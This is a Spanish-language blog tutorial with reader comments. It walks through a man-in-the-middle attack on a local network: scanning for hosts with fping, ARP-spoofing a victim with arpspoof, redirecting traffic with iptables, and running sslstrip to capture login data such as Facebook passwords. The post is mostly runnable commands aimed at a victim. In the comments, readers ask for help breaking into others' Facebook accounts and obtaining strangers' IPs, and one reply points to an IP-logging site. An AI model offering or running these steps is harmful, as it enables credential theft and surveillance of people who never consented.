El día de hoy te mostraré como espiar tráfico http para obtener datos Post y Get desde distribuciones de linux, yo usaré ubuntu, pero tú puedes usar la que prefieras.
Antes que nada quiero aclarar que este tutorial lo hago con fines educativos "El conocimiento es libre" cada quien se hace responsable del uso que le de.
Materiales que utilizaremos
Sslstrip (Descargar)
Fping (sudo apt-get install fping)
Python [Linux lo incluye por defecto](Descargar)
¿Qué es y Cómo funciona?
Todos los datos que tú envías y recibes a través de un navegador web tales como mensajes, formularios o inicio de sesiones se comunican por medio del protocolo http (Hypertext Transfer Protocol) se basa en la arquitectura de Cliente - Servidor esto quiere decir que funciona con Peticiones - Respuestas.
Ejemplo: cuando tú quieres entrar a facebook.com a través de un cliente web estas haciendo una petición al servidor web de facebook y te responde con un html que se traduce al diseño de la pagina que ves en tu navegador.
SSL
Secure Sockets Layer, algo que se traduce en Capa de Conexión segura ahora "TLS", ssl proporciona autentificación y privacidad, encriptando la información que se envía por medio del protocolo http tales como mensajes, usuarios y contraseñas.
Recapitulando
Convierte todo el tráfico https en http sin cifrar y lo captura para luego mostrarnos las peticiones que se realizaron, se puede apreciar este cambio por el prefijo "https" que se sustituye por "http" la desventaja de esto es que solo funciona en una red local.
Iniciemos el tutorial
Como te mencioné anteriormente yo usare la nueva versión de Ubuntu 13.10, tú puedes usar la que prefieras o se adapte mejor a tus necesidades.
Antes que nada, necesitamos las direcciones IP's de la victima, y de el Servidor.
¿Cómo conseguimos la dirección ip?
Bueno el primer paso es saber como está "estructurada" nuestra red, para eso:
ifconfig
Nuestra ip es "192.168.1.64" en este caso pero, ¿Y las demás computadoras?
Para esto existe un comando llamado fping:
Ejecutamos en la terminal:
sudo apt-get install fping
Y después escaneamos los hosts guardándolos en un archivo
"fping -a -g <ipInicial> <IpFinal> > hosts" Ejemplo:
fping -a -g 192.168.1.1 192.168.1.254 > hosts
Para finalmente leer la lista de hosts:
cat hosts
Usaremos 3 terminales para ingresar los siguientes comandos:
Terminal 1:
//Accedemos como Root o Super Usuario
sudo -sH
//Activamos IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
//Ejecutamos el comando arpspoof -i <interfaz> -t <VictimaIP> <Servidor>
arpspoof -i wlan0 -t 192.168.1.104 192.168.1.254
Terminal 2:
//Redireccionamos el trafico http del puerto "80" al "8080"
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
//Ejecutamos sslStrip indicandole "-w" que lo guarde en un archivo y "-l" que escuche por el puerto 8080
sslstrip -w cap -l 8080
Terminal 3:
//Finalmente el comando Tail para leer la información
tail -f cap
Finalmente el resultado:
El navegador de la victima muestra que la información no está viajando de forma cifrada, pero sin ninguna advertencia por parte del navegador, el usuario ingresa sus datos normalmente:
Y la información nos llega a la pantalla de captura:
Todo se muestra normal al ingresar a la pagina:
No hace falta nada más, la información nos ha llegado, en ella incluye el tipo de datos (POST/GET) la url (facebook.com) y finalmente los parámetros.
Y eso es todo! muchas gracias por leer este post.
Hermano, excelente tutorial pero cuando abro la ultima terminal y pongo tail -f cap no me aparece nada en pantalla, gracias
ResponderBorrarMuy bueno viejo sigue con esto.
ResponderBorrarhola, excelente tutorial! Podrias explicarme mejor como obtener el IP de cierta persona?
ResponderBorrarPide que te envie algun e-mail, o que te responda, eso es de lo mas facil y taran..!! ;)
BorrarAlex, para hacer MITM, es decir, para hacer un sniffing de una computadora, esta tiene que estar en tu red domestica (LAN).
BorrarPara sacar la IP de una persona cualquiera, podes, o pasarle alguna pagina web tuya que archive IP´s, o bien enviarle esta pagina que lo hace por vos
whatstheirip . com
es segura, no te va a pasar nada, tenes que proporcionar tu mail para que te mande los datos, en la pagina se te explica como funciona. Esos son dos métodos sencillos.
Hola excelente tuto me ayudarias a hacerlo desde windows es que necesito saber la contraseña de unos facebooks y no e podido hacerlo te agradeceria si me ayudaras espero tu respuesta
ResponderBorrarpff jajja windows ajjajajaja XD viejo un aspirante a hacker jamas usa windows sudo apt-get para todo!!
Borrarjajaj men lo que es que apenas estoy emesando a manejar el linux estoy aprendiendo y aun me cuesta trabajo por eso preguntaba desde windows y con linux se sabe la clave sin necesidad de mandar cosas o de que el escriba la contraseña en el compu de uno?
BorrarVAMOS ESTAS DE BROMA CIERTO?? :D
BorrarWINDOWS??? que te jodan...!!!
jajaja aunque linux es interesante hay juegos que no se pueden usar ahy
Borrarsolo por ahora me lo reconoce windows desafortunadamente
pero tengo un espacio dedicado al linux porque lo estoy aprendiendo a manejar y estaba mirando como hackear un face como sea XD
Brayan con este tutorial podes empezar a usar Ubuntu. Este tipo de cosas son mas efectivas usando sistemas basados en Linux. Windows tiene algunos programas interesantes, pero si de verdad querés aprender te recomiendo dejar de usar Win para estas cosas, y equivocarte mil veces con Linux, eventualmente todo va a ser mas efectivo. Si lo que te interesa de verdad sobre Win son los juegos, siempre podes instalar ambos sistemas en la misma Pc. En Internet hay un sinfín de tutoriales sobre como hacer eso, y mucho mas, para aprender Linux tenes que usarlo. No hay otra manera, ver videos, y leer tutoriales. Éxitos.
BorrarPARA WINDOWS PUES.
ResponderBorrarsi para windows porfis
BorrarHola ya lo intente pero lo que no se es como ver la ip de la victima para hacerlo
ResponderBorrary descifrar su clave me podrían ayudar se los agradecería
Interesante, algo similar de pishing, lo puedes hacer con el fern-wifi-cracker ;)
ResponderBorrarLo que no se especifica es que esto solo funciona en una red local, por ejemplo tu oficina, tu casa o un ciber :p
Si bajan el backtrack o el kali linux, lo podrán hacer ;)
Saludos cordiales...
la ip del servidor seria en este caso la de facebook para que se le envie una pagina falsa? o como?
ResponderBorrarSi usas el F-W-C tienes que poner la IP del gateway de tu red local, comunmente es 192.168.1.254 (En la mayoría de los casos, modem telmex)
ResponderBorrarMas informacion:
https://code.google.com/p/fern-wifi-cracker/
Videos:
Session Hijacking Demonstration